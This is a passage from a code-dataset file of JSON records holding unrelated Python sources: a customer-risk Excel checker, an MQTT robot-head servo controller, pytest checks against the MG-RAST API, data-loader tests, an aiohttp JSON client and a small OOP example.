\"w+\")\n\n\tfout.write('N, Q, S, P_0, P_1, P_2, R_1, R_2, A_1, A_2, \\n')\n\n\tfout.write( fin.read() )\n\n# Now we delete the temp files\n\ndef delete_temp_files():\n\n\tos.remove('appended_results/appended_results.txt') \n\tos.remove('appended_results/clean_appended_results.txt') \n\n###############################################################################\n\nif __name__ == \"__main__\":\n 
main()","sub_path":"_UNUSED/Rearranging_AHHA_data/AHHA_rearranging.py","file_name":"AHHA_rearranging.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"190546424","text":"from gsheet import gsheetService, pd\nfrom os import listdir, getcwd\nfrom os.path import dirname\nfrom customer import checkCustomerRisk, getTimeline, cleanexcel, getCustomerInfo, isValidTimeline\nfrom datetime import datetime\nfrom dotenv import dotenv_values\n\nconfig = dotenv_values(dirname(__file__)+\"/.env\")\nfoldername = config.get('EXCEL')\n\nPATH = dirname(__file__) + f'/{foldername}/'\nfrom pprint import pprint\ndef checkOnefile(file):\n result = []\n excelname = PATH + file\n riskArea = gsheetService()\n customerAllsheet = pd.read_excel(excelname, sheet_name=None).keys()\n customerSheet = [k for k in customerAllsheet if 'Example' not in k]\n customerSheet = [k for k in customerSheet if 'ตัวอย่าง' not in k]\n for j in customerSheet:\n customerData = pd.read_excel(excelname, sheet_name=j)\n customerName = getCustomerInfo(customerData)\n customerData = cleanexcel(customerData)\n customerTimeline = getTimeline(customerData)\n isvalidTl = isValidTimeline(customerTimeline, customerName)\n riskCustomer, riskSheet, risk = checkCustomerRisk(\n customerTimeline, riskArea, customerName)\n # pprint(riskCustomer)\n result.append((file, customerName,isvalidTl, risk, riskCustomer, riskSheet, customerTimeline, customerData.values))\n return result\n\ndef checkOneppl(file):\n result = []\n filename = file[:-2]\n sheet = int(file[-1])\n riskArea = gsheetService()\n excelname = PATH + filename\n customerData = pd.read_excel(excelname, sheet_name=sheet)\n customerName = getCustomerInfo(customerData)\n customerData = cleanexcel(customerData)\n customerTimeline = getTimeline(customerData)\n isvalidTl = isValidTimeline(customerTimeline, customerName)\n riskCustomer, riskSheet, risk = checkCustomerRisk(\n customerTimeline, riskArea, customerName)\n result.extend([filename, customerName,isvalidTl, risk, riskCustomer, riskSheet, customerTimeline, customerData.values])\n return result\n # excelname = PATH + \ndef checkMany(file):\n finalResult = []\n for i in file:\n finalResult.append(checkOnefile(i))\n return finalResult\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"389033887","text":"import paho.mqtt.client as mqtt\nfrom dynamixel_control import Dynamixel\nfrom math import atan2,sqrt,degrees\n# X,Y,Z หมายถึงการหมุนรอบแกน\n\nhost = \"192.168.2.102\" \nport = 1883\n\nportDynamixel = Dynamixel('COM6',1000000) #comport,barudrate\nportDynamixel.connect()\nmotor_type = \"Ax\" #ชนิดของ Motor\n\ndef set_Dynamixel(ID, position):\n portDynamixel.setDeviceMoving(ID, motor_type, position, 1023, 1023)#ID, type, goal position, goal speed, max torque\n\ndef position_known(ID):\n return portDynamixel.getMotorPosition(ID)\n\n\ndef Z_axis(value):\n value = float(value)\n roll = 512\n if int(value) in range(270,360) or int(value) in range(0,90):\n if int(value) in range(270,360):\n roll = (512 + ((value-360) * 3.4))\n elif int(value) in range(0,90):\n roll = (512 + (value*3.4))\n return int(roll)\n\ndef Y_axis(value):\n value = float(value)\n yaw = 512\n if int(value) in range(-90,90):\n if int(value) in range(-90, 0):\n yaw = int(512+(value * -3.4))\n elif int(value) in range(0, 90):\n yaw = int(512-(value * 
3.4))\n return int(yaw)\n\ndef X_axis(value):\n value = float(value)\n pitch = 820\n if int(value) in range(-45,45):\n if int(value) in range(-45,0):\n pitch = int((value * 6.8) + 820)\n elif int(value) in range(0,45):\n pitch = int((value * 3.2) + 820)\n return int(pitch)\n\ndef qtoe(x,y,z,w):\n #eular YZX\n R11 = 1-(2*((y*y)+(z*z)))\n R21 = 2*((x*y)+(z*w))\n R31 = 2*((x*z)-(w*y))\n R22 = 1-(2*((x*x)+(w*w)))\n R23 = 2*((y*z)-(w*x))\n C2 = sqrt((R11*R11)+(R31*R31))\n thata_1 = degrees(atan2((R31/-C2),(R11/C2)))\n thata_2 = degrees(atan2((R21),(-C2)))\n thata_3 = degrees(atan2((R23/-C2),(R22/-C2)))\n thata = [thata_1,thata_2,thata_3]\n return thata\n\ndef on_connect(self, client, userdata, rc):\n print(\"MQTT Connected.\")\n self.subscribe(\"/operator/head/rotation\")\n\n\n\ndef on_message(client, userdata,msg):\n global pos_ID2_Past, pos_ID3_Past, pos_ID12_Past, pos_ID2_Now, pos_ID3_Now, pos_ID12_Now\n data_Q = msg.payload.decode(\"utf-8\", \"strict\")\n data_Q = str(data_Q).split(\",\")\n eular = qtoe(float(data_Q[0]),float(data_Q[1]),float(data_Q[2]),float(data_Q[3]))\n Y = eular[0]\n Z = eular[1]+180\n X = eular[2]\n\n print(\"Y \" + str(Y) + \" \" + str(Y_axis(Y)))\n print(\"Z \" + str(Z) + \" \" + str(Z_axis(Z)))\n print(\"X \" + str(X) + \" \" + str(X_axis(X)))\n\n pos_ID2_Now = X_axis(X)\n pos_ID3_Now = Z_axis(Z)\n pos_ID12_Now = Y_axis(Y)\n\n if abs(pos_ID2_Past - pos_ID2_Now) < 100:\n pos_ID2_Past = pos_ID2_Now\n if abs(pos_ID3_Past - pos_ID3_Now) < 100:\n pos_ID3_Past = pos_ID3_Now\n if abs(pos_ID12_Past - pos_ID12_Now) < 100:\n pos_ID12_Past = pos_ID12_Now\n\n set_Dynamixel(3, pos_ID2_Past)\n set_Dynamixel(2, pos_ID3_Past)\n set_Dynamixel(12, pos_ID12_Past)\n\nif __name__ == \"__main__\":\n DynamixelposID2 = position_known(2)\n DynamixelposID3 = position_known(3)\n DynamixelposID12 = position_known(12)\n DynamixelgoalposID2 = position_known(2)\n DynamixelgoalposID3 = position_known(3)\n DynamixelgoalposID12 = position_known(12)\n \n #X\n pos_ID2_Past = 850 \n pos_ID2_Now = 850\n #Z\n pos_ID3_Past = 512 \n pos_ID2_Now = 512\n #Y\n pos_ID12_Past = 512 \n pos_ID12_Now = 512\n\n client = mqtt.Client()\n client.on_connect = on_connect\n client.on_message = on_message\n client.connect(host)\n client.loop_forever()\n\n\n\n","sub_path":"Vision.Avatar/Dynamixel_control/Avatar_Head.py","file_name":"Avatar_Head.py","file_ext":"py","file_size_in_byte":3558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"473687736","text":"\nimport time\nimport setproctitle\n\nfrom lib.daemon import Daemon\nfrom lib.conky.error import ConkyError\n\nclass ConkyDaemon(Daemon):\n counter = 0\n modules = []\n\n def __init__(self, *args, **kwargs):\n setproctitle.setproctitle('conky-scripts')\n modules = kwargs['modules']\n del kwargs['modules']\n\n kwargs['stdout'] = '/tmp/conky-scripts.out'\n kwargs['stderr'] = '/tmp/conky-scripts.out'\n super(ConkyDaemon, self).__init__(*args, **kwargs)\n\n self.modules = [modclass(modperiod) for (modclass, modperiod) in modules]\n\n def run(self):\n [mod.prepare() for mod in self.modules]\n\n while True:\n for mod in self.modules:\n try:\n mod.try_run(self.counter) \n except Exception as e:\n ConkyError(mod, mod.filename, e).handle()\n time.sleep(1)\n self.counter += 1\n\n def reset_modules(self):\n for mod in self.modules:\n try:\n mod.prepare()\n mod.try_reset()\n except Exception as e:\n ConkyError(mod.obj, mod.filename, 
e).handle()\n\n","sub_path":"conky_scripts/lib/conky/daemon.py","file_name":"daemon.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"496463072","text":"import os\nfrom subprocess import check_output\nimport pytest\n\n# These tests should be quick\n\n# Rotate through API servers listed in API.server.list\n\ndef read_api_list(filename):\n server_list = []\n if not os.path.isfile(filename):\n return [\"http://api.mg-rast.org\", \"https://api.mg-rast.org\"]\n for l in open(filename).readlines():\n server_list.append(l.strip())\n return server_list\n\nAPIS = read_api_list(\"API.server.list\")\n\n@pytest.mark.parametrize(\"API_URL\", APIS)\ndef test_utf8_project(API_URL):\n URL = API_URL + '/project/mgp128?verbosity=full'\n a = check_output('''curl '{}' |file -'''.format(URL), shell=True)\n assert b\"UTF-8\" in a\n\n@pytest.mark.parametrize(\"API_URL\", APIS)\ndef test_utf8_metagenome_export(API_URL):\n URL = API_URL + \"/metagenome/mgm4447943.3?verbosity=metadata\"\n a = check_output('''curl '{}' | file -'''.format(URL), shell=True)\n assert b\"UTF-8\" in a\n\n@pytest.mark.parametrize(\"API_URL\", APIS)\ndef test_utf8_metadata_export(API_URL):\n URL = API_URL + \"/metadata/export/mgp128\"\n a = check_output('''curl '{}' | file -'''.format(URL), shell=True)\n assert b\"UTF-8\" in a\n\n@pytest.mark.parametrize(\"API_URL\", APIS)\ndef test_download_partial(API_URL):\n URL = API_URL + \"/download/mgm4447943.3?file=350.1\"\n a = check_output('''curl '{}' | head -n 100 '''.format(URL), shell=True)\n assert b\"ERROR\" not in a\n assert b\"GF8803K01A00MJ\" in a\n\n@pytest.mark.parametrize(\"API_URL\", APIS)\ndef test_annotation_similarity(API_URL):\n URL = API_URL + \"/annotation/similarity/mgm4447943.3?identity=80&type=function&source=KO\"\n a = check_output('''curl '{}' | head -n 10 '''.format(URL), shell=True)\n assert b\"ERROR\" not in a\n assert b\"\\t\" in a\n\n@pytest.mark.parametrize(\"API_URL\", APIS)\ndef test_annotation_sequence(API_URL):\n URL = API_URL + \"/annotation/sequence/mgm4447943.3?evalue=10&type=organism&source=SwissProt\"\n a = check_output('''curl '{}' | head -n 10 '''.format(URL), shell=True)\n assert b\"ERROR\" not in a\n assert b\"\\t\" in a\n\n@pytest.mark.parametrize(\"API_URL\", APIS)\ndef test_blast_result_http(API_URL):\n URL = API_URL + \"/compute/blast/mgm4447943.3?md5=0001c08aa276d154b7696f9758839786\"\n a = check_output('''curl '{}' '''.format(URL), shell=True)\n assert b\"ERROR\" not in a\n assert b\"alignment\" in a\n\n@pytest.mark.parametrize(\"API_URL\", APIS)\ndef test_blast_result_https(API_URL):\n URL = API_URL + \"/compute/blast/mgm4447943.3?md5=0001c08aa276d154b7696f9758839786\"\n a = check_output('''curl '{}' '''.format(URL), shell=True)\n assert b\"ERROR\" not in a\n assert b\"alignment\" in a\n\n#def test_post1(API_URL):\n# CMD = '''curl -X POST -d '{\"source\":\"KO\",\"type\":\"function\",\"md5s\":[\"000821a2e2f63df1a3873e4b280002a8\",\"15bf1950bd9867099e72ea6516e3d602\"]}' \"https://api.mg-rast.org/annotation/sequence/mgm4447943.3\"''' # EMPTY RETURN DATA\n\n@pytest.mark.parametrize(\"API_URL\", APIS)\ndef test_post2(API_URL):\n URL = API_URL + \"/annotation/sequence/mgm4447943.3\"\n CMD = '''curl -X POST -d '{\"source\":\"SwissProt\",\"type\":\"organism\",\"md5s\":[\"000821a2e2f63df1a3873e4b280002a8\",\"15bf1950bd9867099e72ea6516e3d602\"]}' \"''' + API_URL + '''\"'''\n a = check_output(CMD, shell=True)\n assert b\"ERROR\" not in 
a\n\n@pytest.mark.parametrize(\"API_URL\", APIS)\ndef test_errs_matrix_function(API_URL):\n URL = API_URL + \"/matrix/function?id=mgm4447943.3&id=mgm4447192.3&id=mgm4447102.3&group_level=level3&source=Subsystems&identity=80\"\n print(URL)\n a = check_output('''curl '{}' '''.format(URL), shell=True)\n assert b\"ERROR\" not in a\n@pytest.mark.parametrize(\"API_URL\", APIS)\ndef test_errs_profile(API_URL):\n URL = API_URL + \"/profile/mgm4447943.3?source=RefSeq&format=biom\"\n print(URL)\n a = check_output('''curl '{}' '''.format(URL), shell=True)\n assert b\"ERROR\" not in a\n@pytest.mark.parametrize(\"API_URL\", APIS)\ndef test_errs_matrix_organism(API_URL):\n URL = API_URL + \"/matrix/organism?id=mgm4447943.3&id=mgm4447192.3&id=mgm4447102.3&group_level=family&source=RefSeq&evalue=15\"\n print(URL)\n a = check_output('''curl '{}' '''.format(URL), shell=True)\n assert b\"ERROR\" not in a\n@pytest.mark.parametrize(\"API_URL\", APIS)\ndef test_errs_library(API_URL):\n URL = API_URL + \"/library/mgl52924?verbosity=full\"\n print(URL)\n a = check_output('''curl '{}' '''.format(URL), shell=True)\n assert b\"ERROR\" not in a\n@pytest.mark.parametrize(\"API_URL\", APIS)\ndef test_errs_metadata(API_URL):\n URL = API_URL + \"/metadata/ontology?name=biome&version=2017-04-15\"\n print(URL)\n a = check_output('''curl '{}' '''.format(URL), shell=True)\n assert b\"ERROR\" not in a\n@pytest.mark.parametrize(\"API_URL\", APIS)\ndef test_errs_darkmatter(API_URL):\n URL = API_URL + \"/darkmatter/mgm4447943.3?\"\n print(URL)\n a = check_output('''curl '{}' '''.format(URL), shell=True)\n assert b\"ERROR\" not in a\n@pytest.mark.parametrize(\"API_URL\", APIS)\ndef test_errs_download_history(API_URL):\n URL = API_URL + \"/download/history/mgm4447943.3\"\n print(URL)\n a = check_output('''curl '{}' '''.format(URL), shell=True)\n assert b\"ERROR\" not in a\n\n","sub_path":"tests/test_byhand.py","file_name":"test_byhand.py","file_ext":"py","file_size_in_byte":5107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"31588104","text":"from copy import deepcopy\nfrom typing import Dict, Generator, List, Tuple\nfrom unittest import TestCase\nfrom unittest.mock import Mock, patch\nfrom . 
import data_loader_helper\n\nTEST_DEPENDENCY_GROUPS = [\n {\n \"instances\": 3,\n \"customer\": {\n \"id_base\": 1000,\n \"flags\": [\n {\"flag_definition_id\": \"CUSTOMER_FLAG_DEFINITION_1\"},\n {\"flag_definition_id\": \"CUSTOMER_FLAG_DEFINITION_2\"},\n ],\n },\n \"accounts\": [\n {\n \"account_opening_timestamp\": \"2020-01-01T00:00:00Z\",\n \"instance_param_vals\": {\n \"loan_term\": \"2\",\n \"loan_amount\": \"3000\",\n \"gross_interest_rate\": \"0.098\",\n \"repayment_day\": \"6\",\n },\n \"flags\": [\n {\"flag_definition_id\": \"ACCOUNT_FLAG_DEFINITION_1\"},\n {\"flag_definition_id\": \"ACCOUNT_FLAG_DEFINITION_2\"},\n ],\n }\n ],\n }\n]\n\n\ndef resource_extractors(\n request: Dict,\n) -> Tuple[Generator, Generator, Generator, Generator]:\n\n customer_extractor = (\n resource\n for resource in request[\"resource_batch\"][\"resources\"]\n if \"customer_resource\" in resource\n )\n account_extractor = (\n resource\n for resource in request[\"resource_batch\"][\"resources\"]\n if \"account_resource\" in resource\n )\n customer_flag_extractor = (\n resource\n for resource in request[\"resource_batch\"][\"resources\"]\n if \"flag_resource\" in resource and \"customer_id\" in resource[\"flag_resource\"]\n )\n account_flag_extractor = (\n resource\n for resource in request[\"resource_batch\"][\"resources\"]\n if \"flag_resource\" in resource and \"account_id\" in resource[\"flag_resource\"]\n )\n\n return (\n customer_extractor,\n account_extractor,\n customer_flag_extractor,\n account_flag_extractor,\n )\n\n\nclass DataLoaderHelperTests(TestCase):\n def setUp(self) -> None:\n self.dependency_groups = deepcopy(TEST_DEPENDENCY_GROUPS)\n return super().setUp()\n\n def test_resource_ids_populated_with_customer_ids(self):\n\n customer_ids = []\n for (\n _,\n batch_resource_ids,\n ) in data_loader_helper.create_dataloader_resource_batch_requests(\n dependency_groups=self.dependency_groups,\n product_version_id=\"1\",\n ):\n customer_ids.append(batch_resource_ids.customer_ids)\n\n self.assertListEqual(customer_ids, [[\"1000\", \"1001\", \"1002\"]])\n\n def test_resource_ids_populated_with_account_ids(self):\n\n account_ids: List[List[str]] = []\n for (\n _,\n batch_resource_ids,\n ) in data_loader_helper.create_dataloader_resource_batch_requests(\n dependency_groups=self.dependency_groups,\n product_version_id=\"1\",\n ):\n account_ids.append(\n [\n account_id.split(\"_\", 1)[0]\n for account_id in batch_resource_ids.account_ids\n ]\n )\n\n self.assertListEqual(account_ids, [[\"0\", \"1\", \"2\"]])\n\n @patch.object(data_loader_helper, \"get_flag_resource\")\n def test_resource_ids_populated_with_customer_flag_ids(\n self, get_flag_resource: Mock\n ):\n\n expected_customer_flag_ids = [\n \"1000_CUSTOMER_FLAG_DEFINITION_1\",\n \"1000_CUSTOMER_FLAG_DEFINITION_2\",\n \"1001_CUSTOMER_FLAG_DEFINITION_1\",\n \"1001_CUSTOMER_FLAG_DEFINITION_2\",\n \"1002_CUSTOMER_FLAG_DEFINITION_1\",\n \"1002_CUSTOMER_FLAG_DEFINITION_2\",\n ]\n # Flag ids are randomly generated, so we patch get_flag_resource to get around this\n get_flag_resource.side_effect = [\n {\"id\": id} for id in expected_customer_flag_ids\n ]\n\n flag_ids = []\n self.dependency_groups[0][\"accounts\"][0][\"flags\"] = []\n for (\n _,\n batch_resource_ids,\n ) in data_loader_helper.create_dataloader_resource_batch_requests(\n dependency_groups=self.dependency_groups,\n product_version_id=\"1\",\n ):\n flag_ids.extend(batch_resource_ids.flag_ids)\n\n self.assertListEqual(flag_ids, expected_customer_flag_ids)\n\n @patch.object(data_loader_helper, 
\"get_flag_resource\")\n def test_resource_ids_populated_with_account_flag_ids(\n self, get_flag_resource: Mock\n ):\n\n expected_account_flag_ids = [\n \"0_ACCOUNT_FLAG_DEFINITION_1\",\n \"0_ACCOUNT_FLAG_DEFINITION_2\",\n \"1_ACCOUNT_FLAG_DEFINITION_1\",\n \"1_ACCOUNT_FLAG_DEFINITION_2\",\n \"2_ACCOUNT_FLAG_DEFINITION_1\",\n \"2_ACCOUNT_FLAG_DEFINITION_2\",\n ]\n # Flag ids are randomly generated, so we patch get_flag_resource to get around this\n get_flag_resource.side_effect = [{\"id\": id} for id in expected_account_flag_ids]\n\n flag_ids = []\n self.dependency_groups[0][\"customer\"][\"flags\"] = []\n for (\n _,\n batch_resource_ids,\n ) in data_loader_helper.create_dataloader_resource_batch_requests(\n dependency_groups=self.dependency_groups,\n product_version_id=\"1\",\n ):\n flag_ids.extend(batch_resource_ids.flag_ids)\n\n self.assertListEqual(flag_ids, expected_account_flag_ids)\n\n @patch.object(data_loader_helper, \"get_flag_resource\")\n def test_resource_ids_segregated_by_batch(self, get_flag_resource: Mock):\n\n expected_account_flag_ids = [\n [\n \"0_ACCOUNT_FLAG_DEFINITION_1\",\n \"0_ACCOUNT_FLAG_DEFINITION_2\",\n ],\n [\n \"1_ACCOUNT_FLAG_DEFINITION_1\",\n \"1_ACCOUNT_FLAG_DEFINITION_2\",\n ],\n [\n \"2_ACCOUNT_FLAG_DEFINITION_1\",\n \"2_ACCOUNT_FLAG_DEFINITION_2\",\n ],\n ]\n\n # Flag ids are randomly generated, so we patch get_flag_resource to get around this\n get_flag_resource.side_effect = [\n {\"id\": id}\n for batch_flags in expected_account_flag_ids\n for id in batch_flags\n ]\n\n flag_ids = []\n self.dependency_groups[0][\"customer\"][\"flags\"] = []\n for (\n _,\n batch_resource_ids,\n ) in data_loader_helper.create_dataloader_resource_batch_requests(\n dependency_groups=self.dependency_groups,\n product_version_id=\"1\",\n # The low batch size will result in multiple batches\n batch_size=3,\n ):\n flag_ids.append(batch_resource_ids.flag_ids)\n\n self.assertListEqual(flag_ids, expected_account_flag_ids)\n\n def test_batch_size_greater_than_batch_still_results_in_request(self):\n\n for (\n request,\n _,\n ) in data_loader_helper.create_dataloader_resource_batch_requests(\n dependency_groups=self.dependency_groups,\n product_version_id=\"1\",\n batch_size=1000,\n ):\n self.assertEqual(\n len(request[\"resource_batch\"][\"resources\"]),\n 18,\n \"Expected 18 resources: 3* (1 customer, 2 customer flags, 1 account, 2 customer\"\n \" flags)\",\n )\n\n def test_resources_from_same_instance_not_split_across_batches(self):\n\n for (\n request,\n _,\n ) in data_loader_helper.create_dataloader_resource_batch_requests(\n dependency_groups=self.dependency_groups,\n product_version_id=\"1\",\n batch_size=1,\n ):\n # Each batch has 1 customer, 2 customer flags, 1 account, 2 customer flags\n # despite batch_size = 1\n self.assertEqual(len(request[\"resource_batch\"][\"resources\"]), 6)\n\n def test_resources_split_across_batches(self):\n\n all_requests = []\n for (\n request,\n _,\n ) in data_loader_helper.create_dataloader_resource_batch_requests(\n dependency_groups=self.dependency_groups,\n product_version_id=\"1\",\n # this batch size will result in two batches, one with 12 resources and the other 6\n batch_size=12,\n ):\n all_requests.append(request)\n\n batch_resource_counts = [\n len(request[\"resource_batch\"][\"resources\"]) for request in all_requests\n ]\n self.assertListEqual(batch_resource_counts, [12, 6])\n\n def test_account_customer_dependencies_set_correctly(self):\n\n self.dependency_groups[0][\"instances\"] = 1\n 
self.dependency_groups[0][\"customer\"][\"flags\"] = []\n self.dependency_groups[0][\"accounts\"][0][\"flags\"] = []\n all_requests = []\n for (\n request,\n _,\n ) in data_loader_helper.create_dataloader_resource_batch_requests(\n dependency_groups=self.dependency_groups,\n product_version_id=\"1\",\n ):\n all_requests.append(request)\n\n customers, accounts, _, _ = resource_extractors(all_requests[0])\n customer_resource = next(customers)\n account_resource = next(accounts)\n\n self.assertListEqual(\n [account_resource[\"id\"]], customer_resource[\"dependencies\"]\n )\n self.assertListEqual(\n [customer_resource[\"id\"]], account_resource[\"dependencies\"]\n )\n\n def test_customer_flags_dependencies_set_correctly(self):\n\n self.dependency_groups[0][\"instances\"] = 1\n all_requests = []\n for (\n request,\n _,\n ) in data_loader_helper.create_dataloader_resource_batch_requests(\n dependency_groups=self.dependency_groups,\n product_version_id=\"1\",\n ):\n all_requests.append(request)\n\n customers, accounts, customer_flags, _ = resource_extractors(all_requests[0])\n customer_resource = next(customers)\n account_resource = next(accounts)\n customer_flag_1 = next(customer_flags)\n customer_flag_2 = next(customer_flags)\n\n self.assertListEqual(\n [customer_resource[\"id\"]],\n customer_flag_1[\"dependencies\"],\n \"Customer flag should have a dependency on the customer\",\n )\n self.assertListEqual(\n [customer_resource[\"id\"]],\n customer_flag_2[\"dependencies\"],\n \"Customer flag should have a dependency on the customer\",\n )\n self.assertListEqual(\n [customer_flag_1[\"id\"], customer_flag_2[\"id\"], account_resource[\"id\"]],\n customer_resource[\"dependencies\"],\n \"Customer should have dependencies on both of its flags and the account\",\n )\n\n def test_account_flags_dependencies_set_correctly(self):\n\n self.dependency_groups[0][\"instances\"] = 1\n all_requests = []\n for (\n request,\n _,\n ) in data_loader_helper.create_dataloader_resource_batch_requests(\n dependency_groups=self.dependency_groups,\n product_version_id=\"1\",\n ):\n all_requests.append(request)\n\n _, accounts, _, account_flags = resource_extractors(all_requests[0])\n\n account_resource = next(accounts)\n account_flag_1 = next(account_flags)\n account_flag_2 = next(account_flags)\n\n self.assertListEqual(\n [account_resource[\"id\"]],\n account_flag_1[\"dependencies\"],\n \"Account flag should have a dependency on the account\",\n )\n\n self.assertListEqual(\n [account_resource[\"id\"]],\n account_flag_2[\"dependencies\"],\n \"Account flag should have a dependency on the account\",\n )\n self.assertListEqual(\n [\"1000\", account_flag_1[\"id\"], account_flag_2[\"id\"]],\n account_resource[\"dependencies\"],\n \"Account should have dependencies on the customer and both of its flags\",\n )\n","sub_path":"common/test_utils/endtoend/test_data_loader_helper.py","file_name":"test_data_loader_helper.py","file_ext":"py","file_size_in_byte":12070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"85524703","text":"import json\nimport pprint\nimport aiohttp\n\n\nclass ClientResponseError(Exception):\n \"\"\" ClientResponseError exception class \"\"\"\n\n def __init__(self, wrapped_exception, context):\n super().__init__(\n \"Url {} returned status {}\\n{}\".format(\n context['url'], context['status'], pprint.pformat(context)\n )\n )\n self.wrapped_exception = wrapped_exception\n self.context = context\n\n\nclass ReminizJSONDecodeError(ValueError):\n \"\"\"\n A 
simple variant of the built-in JSONDecodeError, to allow\n    having the failing document in the error message.\n    \"\"\"\n\n    def __init__(self, msg, doc, pos):\n        inner_error = json.JSONDecodeError(msg, doc, pos)\n        super().__init__(inner_error.args[0] + '\\n' + doc)\n\n\nclass ClientResponse:\n    \"\"\" Encapsulate the data returned by the API \"\"\"\n\n    def __init__(self, data, headers, status):\n        self.data = data\n        self.headers = headers\n        self.status = status\n\n    def __str__(self):\n        return \"ClientResponse: \" + str(self.__dict__)\n\n\nclass JSONClient:\n    \"\"\"\n    Utility to encapsulate HTTP calls to a JSON API\n    \"\"\"\n\n    def __init__(self, base_url, *, credentials=None, default_headers={}, timeout=5 * 60):\n        \"\"\"\n        :param base_url: root URL of the JSON server\n        :param credentials: tuple (username, pass) for basic HTTP auth\n        :param default_headers: headers passed to every request\n        \"\"\"\n\n        self._memoized_session = None\n        self.base_url = base_url\n        self.credentials = credentials\n        self.default_headers = default_headers\n        self.timeout = timeout\n\n    async def __aenter__(self):\n        \"\"\"\n        Allows using the client as an async context manager:\n\n        Example:\n\n        ```\n        async with JSONClient(...) as client:\n            await client.get('/')\n        ```\n        \"\"\"\n\n        return self\n\n    async def __aexit__(self, *_args):\n        await self.cleanup()\n\n    @property\n    def _session(self):\n        if self._memoized_session is None:\n            auth = aiohttp.BasicAuth(\n                login=self.credentials[0], password=self.credentials[1]\n            ) if self.credentials else None\n\n            client_timeout = aiohttp.ClientTimeout(total=self.timeout)\n            self._memoized_session = aiohttp.ClientSession(\n                auth=auth, headers=self.default_headers, timeout=client_timeout\n            )\n        return self._memoized_session\n\n    async def fetch(\n        self,\n        method,\n        url,\n        query,\n        data,\n        *,\n        headers={},\n        raise_on_failure=True,\n        data_only=True,\n    ):\n        \"\"\"\n        Make an HTTP request to a JSON endpoint.\n\n        Use of the method-specific functions is preferred.\n\n        :param method: HTTP method to use\n        :param url: url relative to `base_url`\n        :param query: dict representing query parameters\n        :param data: dict representing body of the request (will be json encoded)\n        :param headers: dict with request headers\n        :param raise_on_failure: if `True`, raise an exception for 4XX status code\n        :param data_only: if `False` return a ClientResponse object instead of a dict\n        \"\"\"\n        url = self.base_url + url\n        fetch_func = getattr(self._session, method)\n        async with fetch_func(url, params=query, json=data, headers=headers) as resp:\n            try:\n                response_data = await resp.text()\n                json_data = json.loads(response_data if response_data else \"{}\")\n\n                if raise_on_failure:\n                    resp.raise_for_status()\n\n                if data_only:\n                    return json_data\n                return ClientResponse(json_data, resp.headers, resp.status)\n\n            except aiohttp.ClientResponseError as exception:\n                raise ClientResponseError(\n                    exception, {\n                        'url': url,\n                        'query': query,\n                        'data': data,\n                        'response': json_data,\n                        'status': resp.status\n                    }\n                )\n            except json.JSONDecodeError as error:\n                raise ReminizJSONDecodeError(error.msg, error.doc, error.pos)\n\n    async def get(self, url, query, **kwargs):\n        return await self.fetch('get', url, query, None, **kwargs)\n\n    async def post(self, url, data, **kwargs):\n        return await self.fetch('post', url, None, data, **kwargs)\n\n    async def put(self, url, data, **kwargs):\n        return await self.fetch('put', url, None, data, **kwargs)\n\n    async def patch(self, url, query, data, **kwargs):\n        return await self.fetch('patch', url, query, data, 
**kwargs)\n\n async def delete(self, url, query, **kwargs):\n return await self.fetch('delete', url, query, None, **kwargs)\n\n async def cleanup(self):\n \"\"\"\n Cleanup allocated resources\n \"\"\"\n if self._memoized_session is not None:\n await self._memoized_session.close()\n self._memoized_session = None\n","sub_path":"shared-libs/python/reminiz_utils/http/json_client.py","file_name":"json_client.py","file_ext":"py","file_size_in_byte":5111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"201740050","text":"class KitchenStuff:\n def __init__(self, color, volume):\n self.color = \"light\" + color\n self.volume = volume\n\n def serve(self):\n return f\"Here you have a {self.color} {self.volume}.\"\n\n\nclass Cup(KitchenStuff):\n def __init__(self, color, volume, liquid, style):\n super().__init__(color, volume)\n\n self.liquid = liquid\n self.style = style\n\n def pour_down(self):\n return f\"Pouring {self.volume} ml of {self.liquid}.\"\n\n\nclass Plate(KitchenStuff):\n def __init__(self, color, volume, dish):\n super().__init__(color, volume)\n\n self.dish = dish\n\n def serve(self):\n return f\"Here you have a {self.color} plate of {self.dish}.\"\n\n\noriental_cup = Cup(color=\"red\", volume=200, liquid=\"tea\", style=\"oriental\")\nclassic_cup = Cup(color=\"white\", volume=500, liquid=\"juice\", style=\"classic\")\n\nfish_plate = Plate(color=\"gray\", volume=700, dish=\"fish\")\npasta_plate = Plate(color=\"brown\", volume=1000, dish=\"pasta\")\n\nmy_cups = [oriental_cup, classic_cup]\nmy_plates = [fish_plate, pasta_plate]\n\nfor cup in my_cups:\n print(f\"I like my {cup.color} {cup.style} cup because it has {cup.volume} ml of {cup.liquid}.\")\n print(cup.serve())\n print(cup.pour_down())\n\nfor plate in my_plates:\n print(f\"This is a {plate.color} plate of {plate.dish}.\")\n print(plate.serve())\n","sub_path":"13_OOP.py","file_name":"13_OOP.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"373892802","text":"import numpy as np\nimport tensorflow as tf\nimport os\nimport time\nimport datetime\nimport sys\nimport collections\nimport utils\nfrom transformer import Transformer\n\n\n\n# Data\ntf.flags.DEFINE_string(\"data_path\", \"./data/\", \"Data path\")\ntf.flags.DEFINE_string(\"train\", \"train.txt.npy\", \"Data path to training\")\ntf.flags.DEFINE_string(\"validation\", \"validation.txt.npy\", \"Data path to dev\")\ntf.flags.DEFINE_string(\"calculateEvaluationCCC\", \"./data/calculateEvaluationCCC.py\", \"CCC eval script\")\ntf.flags.DEFINE_string(\"fileCSV\", \"./data/omg_ValidationVideos.csv\", \"validation file\")\n\ntf.flags.DEFINE_string(\"checkpoint_path\", \"./runs/\", \"Data path to dev\")\n\n# Mode\ntf.flags.DEFINE_boolean(\"eval\", False, \"Use test set\")\n\n# model 